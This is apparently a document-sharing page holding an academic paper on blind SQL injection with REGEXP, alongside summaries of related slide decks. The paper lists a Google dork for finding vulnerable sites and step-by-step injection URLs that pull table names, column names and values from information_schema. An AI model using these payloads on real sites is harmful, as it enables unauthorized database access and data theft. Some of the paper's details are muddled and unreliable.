This document discusses an advanced form of blind SQL injection attacks that uses regular expressions to more quickly extract information from a database. It begins by explaining basic SQL injection and how advanced attacks use techniques like regular expressions. It then provides step-by-step examples of how an attacker can use regular expressions to efficiently determine table names, column names, and extract values from a database. Finally, it compares the performance of this technique to normal blind SQL injection attacks, finding the regular expression method reduces the number of queries needed.
1) The maximum number of NBA regulation basketballs that can fit in the Dallas Cowboys' home stadium can be calculated by determining the stadium's volume and dividing it by the volume of a single basketball.
2) Write SQL queries to:
A) List all order items for a user with email "joe@somedomain.com"
B) Return the total order amount for orders with status 4 belonging to customer id 1234
3) To test the password reset feature, questions would be asked about how user accounts are flagged, storing Facebook emails, preventing password resets for Facebook accounts, and handling non-existent accounts.
4) QA's responsibility is to ensure software quality and identify issues through testing before public
This document discusses an advanced blind SQL injection attack technique using regular expressions. It begins by introducing SQL injection and traditional blind SQL injection attacks. It then describes a new method that uses regular expressions to more quickly extract metadata like database tables, columns, and data values from a database. The technique conducts a binary search-like process, progressively narrowing the search range with each query to efficiently determine database schema and extract information without errors or output. The document evaluates this technique as faster than traditional blind SQL injection attacks. It concludes by discussing precautions like input validation to prevent SQL injection vulnerabilities.
This document discusses SQL injection vulnerabilities and techniques. It describes SQL injection as a type of attack where an attacker asks a database true or false questions to determine information based on application responses. Error-based SQL injection exploits errors returned by the server to execute attacks. Blind SQL injection must infer responses through techniques like using the SLEEP() function. The document provides examples of SQL injection attacks and commands. It recommends preventing SQL injection by sanitizing user input with functions like mysqli_real_escape_string before database queries.
The document discusses web application security and SQL injections. It defines a web application as any application served via HTTP/HTTPS from a remote server. Web applications often collect sensitive personal data, so security is important to protect privacy and limit legal liability. Hackers can exploit vulnerabilities like SQL injections to access unauthorized data. The document outlines common SQL injection techniques, like modifying queries with additional commands or UNION operators, and recommends best practices like parameterized queries and input validation to prevent SQL injections.
This document discusses blind SQL injection vulnerabilities. It explains that even if error messages are disabled, applications may still be vulnerable to blind SQL injection attacks where the attacker can make true/false queries to extract information from the database. It provides an example of how an attacker could extract the name of a database table one character at a time using such queries. The document recommends moving all SQL statements to stored procedures to prevent user input from modifying the syntax of queries.
This document discusses blind SQL injection vulnerabilities. It explains that even if error messages are disabled, applications may still be vulnerable to blind SQL injection attacks where the attacker can make true/false queries to extract information from the database. It provides an example of how an attacker could extract the name of a database table one character at a time using such queries. The document recommends moving all SQL statements to stored procedures to prevent user input from modifying the syntax of queries.
SQL interview questions jeetendra mandal - part 5jeetendra mandal
SQL injection is a hacking technique where malicious code is added to steal user information and passwords directly from databases. Triggers automatically respond to data modification language operations like insert, update or delete. To find the nth highest salary, we select the top N salaries ordered descending and then select the top 1 from that result ordered by salary.
The document discusses different types of SQL injection attacks, including tautologies, illegal/logically incorrect queries, union queries, piggybacked queries, and stored procedures. Tautologies aim to bypass authentication by making conditional statements always true. Illegal queries gather database information by causing syntax or type errors. Union queries extract data by combining results from multiple tables. Piggybacked queries maliciously execute additional queries by abusing query delimiters. Stored procedures can be used to escalate privileges or execute remote commands if vulnerabilities exist. Examples are provided for each type of attack along with potential solutions.
1) The maximum number of NBA regulation basketballs that can fit in the Dallas Cowboys' home stadium can be calculated by determining the stadium's volume and dividing it by the volume of a single basketball.
2) Write SQL queries to:
A) List all order items for a user with email "joe@somedomain.com"
B) Return the total order amount for orders with status 4 belonging to customer id 1234
3) To test the password reset feature, questions would be asked about how user accounts are flagged, storing Facebook emails, preventing password resets for Facebook accounts, and handling non-existent accounts.
4) QA's responsibility is to ensure software quality and identify issues through testing before public
This document discusses an advanced blind SQL injection attack technique using regular expressions. It begins by introducing SQL injection and traditional blind SQL injection attacks. It then describes a new method that uses regular expressions to more quickly extract metadata like database tables, columns, and data values from a database. The technique conducts a binary search-like process, progressively narrowing the search range with each query to efficiently determine database schema and extract information without errors or output. The document evaluates this technique as faster than traditional blind SQL injection attacks. It concludes by discussing precautions like input validation to prevent SQL injection vulnerabilities.
This document discusses SQL injection vulnerabilities and techniques. It describes SQL injection as a type of attack where an attacker asks a database true or false questions to determine information based on application responses. Error-based SQL injection exploits errors returned by the server to execute attacks. Blind SQL injection must infer responses through techniques like using the SLEEP() function. The document provides examples of SQL injection attacks and commands. It recommends preventing SQL injection by sanitizing user input with functions like mysqli_real_escape_string before database queries.
The document discusses web application security and SQL injections. It defines a web application as any application served via HTTP/HTTPS from a remote server. Web applications often collect sensitive personal data, so security is important to protect privacy and limit legal liability. Hackers can exploit vulnerabilities like SQL injections to access unauthorized data. The document outlines common SQL injection techniques, like modifying queries with additional commands or UNION operators, and recommends best practices like parameterized queries and input validation to prevent SQL injections.
This document discusses blind SQL injection vulnerabilities. It explains that even if error messages are disabled, applications may still be vulnerable to blind SQL injection attacks where the attacker can make true/false queries to extract information from the database. It provides an example of how an attacker could extract the name of a database table one character at a time using such queries. The document recommends moving all SQL statements to stored procedures to prevent user input from modifying the syntax of queries.
This document discusses blind SQL injection vulnerabilities. It explains that even if error messages are disabled, applications may still be vulnerable to blind SQL injection attacks where the attacker can make true/false queries to extract information from the database. It provides an example of how an attacker could extract the name of a database table one character at a time using such queries. The document recommends moving all SQL statements to stored procedures to prevent user input from modifying the syntax of queries.
SQL interview questions jeetendra mandal - part 5jeetendra mandal
SQL injection is a hacking technique where malicious code is added to steal user information and passwords directly from databases. Triggers automatically respond to data modification language operations like insert, update or delete. To find the nth highest salary, we select the top N salaries ordered descending and then select the top 1 from that result ordered by salary.
The document discusses different types of SQL injection attacks, including tautologies, illegal/logically incorrect queries, union queries, piggybacked queries, and stored procedures. Tautologies aim to bypass authentication by making conditional statements always true. Illegal queries gather database information by causing syntax or type errors. Union queries extract data by combining results from multiple tables. Piggybacked queries maliciously execute additional queries by abusing query delimiters. Stored procedures can be used to escalate privileges or execute remote commands if vulnerabilities exist. Examples are provided for each type of attack along with potential solutions.
SQL injection is a type of attack where malicious SQL code is injected into an application's database query, potentially exposing or modifying private data. Attackers can bypass logins, access secret data, modify website contents, or shut down databases. SQL injection occurs when user input is not sanitized before being used in SQL queries. Attackers first find vulnerable websites, then check for errors to determine the number of columns. They use "union select" statements to discover which columns are responsive to queries, allowing them to extract data like user credentials or database contents. Developers should sanitize all user inputs to prevent SQL injection attacks.
The document discusses developing secure web applications. It proposes using input validation, encryption of sensitive data, preventing SQL injection attacks, and collecting access logs. Input is validated by only allowing a whitelist of known good characters. Sensitive data like passwords are encrypted using an encryption algorithm. SQL injection is prevented by replacing malicious strings with blank spaces. Access logs record client IP addresses and page requests to trace activity and block malicious IPs. The techniques aim to make web applications and data more secure against common attacks like SQL injection, brute force, and denial of service.
This document discusses why SQL has endured as the dominant language for data analysis for over 40 years. SQL provides a powerful yet simple framework for querying data through its use of relational algebra concepts like projection, filtering, joining, and aggregation. It also allows for transparent optimization by the database as SQL is declarative rather than procedural. Additionally, SQL has continuously evolved through standards while providing access to a wide variety of data sources.
The document discusses SQL injection in Oracle-based applications. It begins by defining SQL injection and explaining how it works by manipulating user-supplied data to alter SQL statements. It then provides examples of how SQL can be injected into Oracle to extract data, enumerate privileges, and abuse stored procedures. The document concludes by discussing ways to prevent SQL injection, such as avoiding dynamic SQL, using bind variables, and following the principle of least privilege.
This document discusses SQL injection techniques, including basics, advanced methods, and blind SQL injection. It begins with an overview of SQL injection and how websites interact with databases. It then demonstrates basic SQL injection to bypass authentication. Advanced techniques covered include finding database/table/column details and extracting data. Blind SQL injection is discussed for when errors are not displayed, requiring binary searching of ASCII character codes to extract information character by character.
This document discusses SQL injection attacks and how to mitigate them. It begins by explaining how injection attacks work by tricking applications into executing unintended commands. It then provides examples of how SQL injection can be used to conduct unauthorized access and data modification attacks. The document discusses techniques for finding and exploiting SQL injection vulnerabilities, including through the SELECT, INSERT, UPDATE and UNION commands. It also covers ways to mitigate injection attacks, such as using prepared statements with bound parameters instead of concatenating strings.
This document contains 27 SQL interview questions and answers. It begins by defining SQL and some key SQL concepts like DBMS, RDBMS, constraints, joins, normalization, indexes, and aggregate functions. It then covers more advanced topics like SQL injection, data modeling with one-to-one, one-to-many and many-to-many relationships, handling duplicates and outliers, and window functions. The document also includes questions on triggers, stored procedures, database testing and more. It aims to prepare candidates for SQL-related questions that may come up during technical interviews.
A full course of what is SQL injection, how it affects us, how we can protect our website by it, some real scenarios where I discuss about the 3 main methods: union based where we get all the information by only one query, error based where we use known errors from MySQL to obtain the information from the database and blind based where we call the server to response to queries as true or false and we verify the solutions, conclusions, protection methods and I also added biography from where i read and added some more information from my personal knowledge.
PS: The images look better when the presentation is downloaded on the hard drive !
SQL injection attack is the most common and difficult to handle attacks now days. SQL injection attack is of five types. In these paper details of SQL injection is mentioned.
This document discusses SQL injection attacks and how to mitigate them. It begins by defining injection attacks as tricks that cause an application to unintentionally include commands in user-submitted data. It then explains how SQL injection works by having the attacker submit malicious SQL code in a web form. The document outlines several examples of SQL injection attacks, such as unauthorized access, database modification, and denial of service. It discusses techniques for finding and exploiting SQL injection vulnerabilities. Finally, it recommends effective mitigation strategies like prepared statements and input whitelisting to protect against SQL injection attacks.
Guide To Mastering The MySQL Query Execution PlanOptimiz DBA
In this PPT, we will go in-depth into the world of MySQL query execution plan. We will break it down into its fundamental concepts and learn how it works and how to make use of it in our SQL optimization processes.
This presentation features the fundamentals of SQL tunning like SQL Processing, Optimizer and Execution Plan, Accessing Tables, Performance Improvement Consideration Partition Technique. Presented by Alphalogic Inc : https://www.alphalogicinc.com/
Discover Spring ’20 Release features! We are sharing release highlights for Developers (and Admins), curated and published by Salesforce product experts, as part of Learn MOAR
The document discusses various techniques for exploiting SQL injection vulnerabilities, including classical and blind SQL injection. It provides examples of exploiting SQL injection on different database management systems like MySQL, PostgreSQL, Oracle, and Microsoft SQL Server. It also discusses methods for bypassing web application firewalls during SQL injection attacks.
SQL injection is a web security vulnerability that allows attackers to interfere with or gain access to a database through a web application. It occurs when user input is not validated for SQL keywords and special characters that could modify the intended SQL queries. Attackers can use SQL injection to read sensitive data from the database, modify database contents, or even execute administrative operations. Proper input validation and output encoding can help prevent SQL injection attacks.
SQL injection is a type of attack where malicious SQL statements are inserted into an entry field for execution behind the scenes. It can be used to read or modify data in the database without authorization. Attackers can exploit vulnerabilities in an application's use of dynamic SQL queries constructed from user input. Common techniques for SQL injection include altering queries to return additional records or modify database content. Developers can prevent SQL injection by sanitizing all user input, using parameterized queries, and granting only necessary privileges to database users.
UnityNet World Environment Day Abraham Project 2024 Press ReleaseLHelferty
June 12, 2024 UnityNet International (#UNI) World Environment Day Abraham Project 2024 Press Release from Markham / Mississauga, Ontario in the, Greater Tkaronto Bioregion, Canada in the North American Great Lakes Watersheds of North America (Turtle Island).
Methanex is the world's largest producer and supplier of methanol. We create value through our leadership in the global production, marketing and delivery of methanol to customers. View our latest Investor Presentation for more details.
More Related Content
Similar to Understanding advanced blind sqli attack
SQL injection is a type of attack where malicious SQL code is injected into an application's database query, potentially exposing or modifying private data. Attackers can bypass logins, access secret data, modify website contents, or shut down databases. SQL injection occurs when user input is not sanitized before being used in SQL queries. Attackers first find vulnerable websites, then check for errors to determine the number of columns. They use "union select" statements to discover which columns are responsive to queries, allowing them to extract data like user credentials or database contents. Developers should sanitize all user inputs to prevent SQL injection attacks.
The document discusses developing secure web applications. It proposes using input validation, encryption of sensitive data, preventing SQL injection attacks, and collecting access logs. Input is validated by only allowing a whitelist of known good characters. Sensitive data like passwords are encrypted using an encryption algorithm. SQL injection is prevented by replacing malicious strings with blank spaces. Access logs record client IP addresses and page requests to trace activity and block malicious IPs. The techniques aim to make web applications and data more secure against common attacks like SQL injection, brute force, and denial of service.
This document discusses why SQL has endured as the dominant language for data analysis for over 40 years. SQL provides a powerful yet simple framework for querying data through its use of relational algebra concepts like projection, filtering, joining, and aggregation. It also allows for transparent optimization by the database as SQL is declarative rather than procedural. Additionally, SQL has continuously evolved through standards while providing access to a wide variety of data sources.
The document discusses SQL injection in Oracle-based applications. It begins by defining SQL injection and explaining how it works by manipulating user-supplied data to alter SQL statements. It then provides examples of how SQL can be injected into Oracle to extract data, enumerate privileges, and abuse stored procedures. The document concludes by discussing ways to prevent SQL injection, such as avoiding dynamic SQL, using bind variables, and following the principle of least privilege.
This document discusses SQL injection techniques, including basics, advanced methods, and blind SQL injection. It begins with an overview of SQL injection and how websites interact with databases. It then demonstrates basic SQL injection to bypass authentication. Advanced techniques covered include finding database/table/column details and extracting data. Blind SQL injection is discussed for when errors are not displayed, requiring binary searching of ASCII character codes to extract information character by character.
This document discusses SQL injection attacks and how to mitigate them. It begins by explaining how injection attacks work by tricking applications into executing unintended commands. It then provides examples of how SQL injection can be used to conduct unauthorized access and data modification attacks. The document discusses techniques for finding and exploiting SQL injection vulnerabilities, including through the SELECT, INSERT, UPDATE and UNION commands. It also covers ways to mitigate injection attacks, such as using prepared statements with bound parameters instead of concatenating strings.
This document contains 27 SQL interview questions and answers. It begins by defining SQL and some key SQL concepts like DBMS, RDBMS, constraints, joins, normalization, indexes, and aggregate functions. It then covers more advanced topics like SQL injection, data modeling with one-to-one, one-to-many and many-to-many relationships, handling duplicates and outliers, and window functions. The document also includes questions on triggers, stored procedures, database testing and more. It aims to prepare candidates for SQL-related questions that may come up during technical interviews.
A full course of what is SQL injection, how it affects us, how we can protect our website by it, some real scenarios where I discuss about the 3 main methods: union based where we get all the information by only one query, error based where we use known errors from MySQL to obtain the information from the database and blind based where we call the server to response to queries as true or false and we verify the solutions, conclusions, protection methods and I also added biography from where i read and added some more information from my personal knowledge.
PS: The images look better when the presentation is downloaded on the hard drive !
SQL injection attack is the most common and difficult to handle attacks now days. SQL injection attack is of five types. In these paper details of SQL injection is mentioned.
This document discusses SQL injection attacks and how to mitigate them. It begins by defining injection attacks as tricks that cause an application to unintentionally include commands in user-submitted data. It then explains how SQL injection works by having the attacker submit malicious SQL code in a web form. The document outlines several examples of SQL injection attacks, such as unauthorized access, database modification, and denial of service. It discusses techniques for finding and exploiting SQL injection vulnerabilities. Finally, it recommends effective mitigation strategies like prepared statements and input whitelisting to protect against SQL injection attacks.
Guide To Mastering The MySQL Query Execution PlanOptimiz DBA
In this PPT, we will go in-depth into the world of MySQL query execution plan. We will break it down into its fundamental concepts and learn how it works and how to make use of it in our SQL optimization processes.
This presentation features the fundamentals of SQL tunning like SQL Processing, Optimizer and Execution Plan, Accessing Tables, Performance Improvement Consideration Partition Technique. Presented by Alphalogic Inc : https://www.alphalogicinc.com/
Discover Spring ’20 Release features! We are sharing release highlights for Developers (and Admins), curated and published by Salesforce product experts, as part of Learn MOAR
The document discusses various techniques for exploiting SQL injection vulnerabilities, including classical and blind SQL injection. It provides examples of exploiting SQL injection on different database management systems like MySQL, PostgreSQL, Oracle, and Microsoft SQL Server. It also discusses methods for bypassing web application firewalls during SQL injection attacks.
SQL injection is a web security vulnerability that allows attackers to interfere with or gain access to a database through a web application. It occurs when user input is not validated for SQL keywords and special characters that could modify the intended SQL queries. Attackers can use SQL injection to read sensitive data from the database, modify database contents, or even execute administrative operations. Proper input validation and output encoding can help prevent SQL injection attacks.
SQL injection is a type of attack where malicious SQL statements are inserted into an entry field for execution behind the scenes. It can be used to read or modify data in the database without authorization. Attackers can exploit vulnerabilities in an application's use of dynamic SQL queries constructed from user input. Common techniques for SQL injection include altering queries to return additional records or modify database content. Developers can prevent SQL injection by sanitizing all user input, using parameterized queries, and granting only necessary privileges to database users.
UnityNet World Environment Day Abraham Project 2024 Press ReleaseLHelferty
June 12, 2024 UnityNet International (#UNI) World Environment Day Abraham Project 2024 Press Release from Markham / Mississauga, Ontario in the, Greater Tkaronto Bioregion, Canada in the North American Great Lakes Watersheds of North America (Turtle Island).
Methanex is the world's largest producer and supplier of methanol. We create value through our leadership in the global production, marketing and delivery of methanol to customers. View our latest Investor Presentation for more details.
The E-Way Bill revolutionizes logistics by digitizing the documentation of goods transport, ensuring transparency, tax compliance, and streamlined processes. This mandatory, electronic system reduces delays, enhances accountability, and combats tax evasion, benefiting businesses and authorities alike. Embrace the E-Way Bill for efficient, reliable transportation operations.
Cleades Robinson, a respected leader in Philadelphia's police force, is known for his diplomatic and tactful approach, fostering a strong community rapport.
World economy charts case study presented by a Big 4
World economy charts case study presented by a Big 4
World economy charts case
World economy charts case study presented by a Big 4
World economy charts case study presented by a Big 4World economy charts case study presented by a Big 4
World economy charts case study presented by a Big 4
World economy charts case study presented by a Big 4World economy charts case study presented by a Big 4World economy charts case study presented by a Big 4World economy charts case study presented by a Big 4World economy charts case study presented by a Big 4World economy charts case study presented by a Big 4World economy charts case study presented by a Big 4World economy charts case study presented by a Big 4World economy charts case study presented by a Big 4World economy charts case study presented by a Big 4World economy charts case study presented by a Big 4World economy charts case study presented by a Big 4World economy charts case study presented by a Big 4World economy charts case study presented by a Big 4study presented by a Big 4
ZKsync airdrop of 3.6 billion ZK tokens is scheduled by ZKsync for next week.pdfSOFTTECHHUB
The world of blockchain and decentralized technologies is about to witness a groundbreaking event. ZKsync, the pioneering Ethereum Layer 2 network, has announced the highly anticipated airdrop of its native token, ZK. This move marks a significant milestone in the protocol's journey, empowering the community to take the reins and shape the future of this revolutionary ecosystem.
ZKsync airdrop of 3.6 billion ZK tokens is scheduled by ZKsync for next week.pdf
Understanding advanced blind sqli attack
1. International Journal of Engineering Research and General Science Volume 3, Issue 3, May-June, 2015
ISSN 2091-2730
1548 www.ijergs.org
Understanding Advanced Blind SQLI attack
Amit Dabas, Ashish Kumar Sharma
Cyber Forensics & Information Security, MDU,amitdab@gmail.com,+918588831807
Abstract— SQL Injection is not new attack to our web applications and because of its awareness now it’s on decline every year but
still advanced SQL injections are getting introduced and effecting the web applications constantly. In this paper we will analyze an
example of Advanced Blind SQL injection with improved query structure using regular expressions which has made blind SQL
injection faster and more effective than normal Blind Injection. Better we understand an attack better we find its cure.
Keywords— Advanced SQL Injection, Blind SQL Injection, Blind SQL Injection with Example, Blind SQL Injection with Regular
expressions attack, Input validation, Advance SQL Attack, Binary search SQLI.
INTRODUCTION
Firstly we have discussed simple SQL injection. SQL injection came as soon our database based applications started flourishing on
World Wide Web. These attacks are basically unauthorized access of database through URL or Input methods which have a
connection with database to show or connect client with the data. So mainly it is a mistake in coding by developers who does not
parameterized input data or security check and accepts data from client which can modify, extract or delete data.
Advance Google search has been of great help for such attackers as they use it for finding SQLI attack vulnerable websites. In
vulnerability test attacker pass extra data or modify current URL so the query at backend changed and if any error comes due to this
modification the website is considered as vulnerable.
If an application does not return error messages, it may be susceptible to our advanced blind SQL injection attacks.
1. Finding vulnerable websites:
Google dorks can be of great help if we need to search SQLI vulnerable websites when we do not have specific website to attack or
need to find many websites together.
Example:
In Google search Input box we enter query => site:.com inurl:.php?id=
Result will be all such websites which may be using id to call some data from database and satisfying our conditions.
Web applications commonly use SQL queries with client-supplied input in the WHERE clause to retrieve data from a database.
By adding additional conditions to the SQL statement and evaluating the web application‘s output, you can determine whether or not
the application is vulnerable to SQL injection. Finding vulnerability is our first step which determines what type of attack we use.
For example, A URL for accessing the products of a company might look like this:
http://www.abc.com/xyz.php?productID=35
SQL query statement used by the developers for fetching the data from the given website for example would be like this
SELECT * from products where product id=35
Database will result the products and they will appear on the web page.
To determine the application is vulnerable or not to SQL injections, try injecting an extra true condition into the WHERE clause. If we
request an URL
2. International Journal of Engineering Research and General Science Volume 3, Issue 3, May-June, 2015
ISSN 2091-2730
1549 www.ijergs.org
http://www.a.com/xyz.php?news=35and5=5—
The query would become
SELECT * from news where news id=35 and 5=5
so, here if the query returns the same page, then the application is susceptible to SQL injection. Part of the user‘s input is interpreted
as SQL code.
A secure application would reject this request because it would treat the user‘s input as a value, and the value ―5 AND 1=1‖ would
cause a type mismatch error. The server would not display a press release.
2. Advanced blind SQL injection using regular expression
This attack is combination of guess and binary search algorithm as we need to guess the name of table but using REGEXP our search
criteria follows binary algorithm as it will give options from A-Z and so on till exact word doesn‘t match. As we use binary search
algorithm in this attack that saves us time in comparison to normal blind attacks or we can say straightaway half the searches get
reduced by binary search algorithm.
2.1 REGEXP attack's methodology
This is fast attack to extract information from a database. With this we can save a lot of time and bandwidth as its methodology is
simple. We define a range of numbers/chars/special chars that will be matched with REGEXP (MySQL) or LIKE (MSSQL) functions.
It is a pattern matching operation based on regular expressions and the REGEXP operator. It is a powerful way of specifying a pattern
for a complex search. So this attack is guessing of table names or column names but using a pattern match method available in
MySQL similarly if we need to do this in MSSQL we can use LIKE function but REGEXP is considered powerful function when it
comes to search in complex data. Let‘s start with an example.
2.2 Finding if tables exist in database
First of all we check that database have tables or not by using following blind attack if it results as no change in web page then tables
exist if it shows error then it‘s not vulnerable to blind attack or no tables in database in that case we can study the error displayed for
other kind of SQL attacks. As we know INFORMATION_SCHEMA are the views which allows us to retrieve metadata about the
objects within a database that‘s why we use INFORMATION_SCHEMA for guessing and searching of user made tables in database.
http://www.abc.com/daily/content.php?id=85019 and 1=(select 1 from information_schema.table_constraints limit 0,1) --
Here we used TABLE_CONSTRAINTS with INFORMATION_SCHEMA so that only user made table can be tested otherwise it will
attack on all tables and all databases have few default tables which an attacker won‘t like to use so TABLE_CONSTRAINTS saves
time for attacker by providing only user made tables .After looking for available tables in database comes our next step.
2.3 Extracting table name
So Next we find table names using guess method for example if we think there will be database named as USER then first we try U
and other words in regexp range so exact name can be extracted. This guess method depends on the attacker as which table he/she
want to access if an attacker want to find username or password containing table then he will guess the name accordingly.
http://www.abc.com/daily/content.php?id=85019 and 1=(select 1 from information_schema.table_constraints where table_name
regexp ‗^[a-z]‘ limit 0,1) –
Above query searched for the table name from ‗A-Z‘ range if it results true that mean our table name starts with an alphabet and we
reduce the range like a Boolean search method searching in two parts from ‗A-M‘ & ‗N-Z‘ and keep repeating the query till we gets
single character which would be first letter of our table name though if it results false we can try numeric range too. In this case we
know that the first matched record start with a char between [a -> z] this example will show you how to extract the complete name of
the record [1]:
http://www.abc.com/daily/content.php?id=85019 and 1=(select 1 from information_schema.table_constraints where table_name
regexp ‗^u[a-z]‘ limit 0,1) –
3. International Journal of Engineering Research and General Science Volume 3, Issue 3, May-June, 2015
ISSN 2091-2730
1550 www.ijergs.org
If we have found first character of our table then we follow same method to find other charcters so if it‘s true we try next query
http://www.abc.com/daily/content.php?id=85019 and 1=(select 1 from information_schema.table_constraints where table_name
regexp ‗^us[a-z]‘ limit 0,1) –
Similarly we follow till we don‘t get FALSE
http://www.abc.com/daily/content.php?id=85019 and 1=(select 1 from information_schema.table_constraints where table_name
regexp ‗^users[a-z]‘ limit 0,1) –
Above query results false as the table name is USERS so we extracted the table name USERS. If we don‘t want to use guess and
search method we simply use search method where like our binary search the range of REGEXP keep on dividing itself in half till we
don‘t find one word.
2.4 Extracting Column name
Similar after our table name guess and search method we extract column name with following query
www.abc.com/daily/content.php?id=85019 and 1=(select 1 from information_schema.columns where table_name=access and
column_name regexp '^[a-z]' limit 0,1) –
SO either we use guess and search or direct search with REGEXP here we used search only without any guess so after first true query
we divided it from middle and keep searching exact word like our table guess.
www.abc.com/daily/content.php?id=85019 and 1=(select 1 from information_schema.columns where table_name=access and
column_name regexp '^[a-m]' limit 0,1) –
If the result of the above query comes true we divide it further till we reach an output
www.abc.com/daily/content.php?id=85019 and 1=(select 1 from information_schema.columns where table_name=access and
column_name regexp '^[a-f]' limit 0,1) –
True
www.abc.com/daily/content.php?id=85019 and 1=(select 1 from information_schema.columns where table_name=access and
column_name regexp '^[a-c]' limit 0,1) –
False
www.abc.com/daily/content.php?id=85019 and 1=(select 1 from information_schema.columns where table_name=access and
column_name regexp '^[d-f]' limit 0,1) –
True
www.abc.com/daily/content.php?id=85019 and 1=(select 1 from information_schema.columns where table_name=access and
column_name regexp '^[f]' limit 0,1) –
True
So we have found first letter ‗f‘ similarly other letters can be found but if another table starts with the same first letter or not we can
check by changing our limit
www.abc.com/daily/content.php?id=85019 and 1=(select 1 from information_schema.columns where table_name=access and
column_name regexp '^[f]' limit 1,1) –
False
There are no more tables that start with 'f'. From now on we must change the regular expression like this:
4. International Journal of Engineering Research and General Science Volume 3, Issue 3, May-June, 2015
ISSN 2091-2730
1551 www.ijergs.org
'^f[a-z]' -> '^fi[a-z]' -> '^fir[a-z]' -> '^first[a-z]' -> FALSE
When we get FALSE in end that mean that‘s the complete name of our table which we will use further to extract data. It is repetitive
method after finding first character we keep repeating our expression till we gets complete table name.
2.5 Extracting value from database
We continue to follow same method but now we have name of our able and column so we can use them to extract value from column
which becomes easier now by availability of basic information of our database.
www.abc.com/daily/content.php?id=85019 and 1=(select 1 from users where First regexp '^[a-z]' limit 0,1) –
True
www.abc.com/daily/content.php?id=85019 and 1=(select 1 from users where First regexp '^[a-m]' limit 0,1) --
False
www.abc.com/daily/content.php?id=85019 and 1=(select 1 from users where First regexp '^[n-z]' limit 0,1) --
True
www.abc.com/daily/content.php?id=85019 and 1=(select 1 from users where First regexp '^[t-z]' limit 0,1) --
True
If we need to attack MSSQL, the syntax becomes more complicated because in MSSQL LIMIT and REGEXP are not present. To
bypass it, we must use TOP and LIKE functions. [1]
3. Precautions
Precaution is best cure same comes in SQL attacks as we know it happens to be developer‘s mistakes or ignorance in input validation
which causes most of SQLI attacks when it is about advanced SQLI attack security few precautions are must for our web application
security.
White List Input Validation: Stop the enemy at your door it is input filtration method to validate or detect unauthorized input
before it is processed by the application.
Checking Input Type: Easy for developers to do but very basic step to stop wrong or malicious input types to be entered in
our input boxes.[2]
Escape database Meta characters: use / in order to escape database Meta characters by prepending / in front of Meta
characters.[2]
Taking care of Headers as well as query string to be passed in our database.[2]
Parameterized Queries: Till date parameterized queries are best prevention from any kind of SQL Injection.
4. Comparison between normal and REGEXP base blind SQLI attack
It is been very clearly mentioned in IHTEAM Paper that in MD5 case. We must export a hash of 32 chars using a blind SQL injection.
We know that there are only 16 chars to be tested (1234567890abcdef) though in an optimistic case, Regexp and normal blind need 32
query to be done. [1]
While if we compare Regexp Blind SQLI Attack with normal SQLI attacks its more time consuming around 10x more time
consuming then the basic and in a worst-case, Regexp need 128 query and normal blind need 512 query[1]. But when we compare this
advanced blind SQLI attack to normal attacks we get to know the time difference and efficiency. Most of the developers , who are in
5. International Journal of Engineering Research and General Science Volume 3, Issue 3, May-June, 2015
ISSN 2091-2730
1552 www.ijergs.org
early stage of developing just consider basic steps for security of website from SQLI attacks such websites if targeted with no time
limit then Blind SQLI with Regexp is very effective but if attackers are looking for mass attack then blind SQLI will be difficult to
perform.
5. Conclusion
With comparison of REGEXP base and normal blind SQL we have found that this new method is effective and fast for hacking so our
web applications with database need to be more secure as only hiding of database errors won‘t work with the advanced SQLI attacks.
As in the other referenced papers it is mentioned about blind SQLI using regular expressions but by guessing schema name as we
approached more and more concise results with default INFORMATION_SCHEMA methodology.
REFERENCES:
[1] Blind Sql Injection with Regular Expressions Attack:IHTEAM
[2] Full MSSQL Injection PWNage: ZeQ3uL && JabAv0C cwh.citec.us
[3] Guimarães, B. D., "Advanced SQL Injection to Operating System Full Control," Black Hat Europe, white paper, April 2009
[4] Sagar Joshi (2005): SQL injection attack and defense: Web Application and SQL injection.
http://www.securitydocs.com/library/3587
[5] William G.J. Halfond, Jeremy Viegas, and Alessandro Orso (2006): A Classification of SQL Injection Attacks and
Countermeasures. IEEE Conference.
[6] "SQL Injection Are Your Web Applications Vulnerable?". SPI Dynamics. 2002.
[7] http://www.spidynamics.com/papers/SQLInjectionWhitePaper.pdf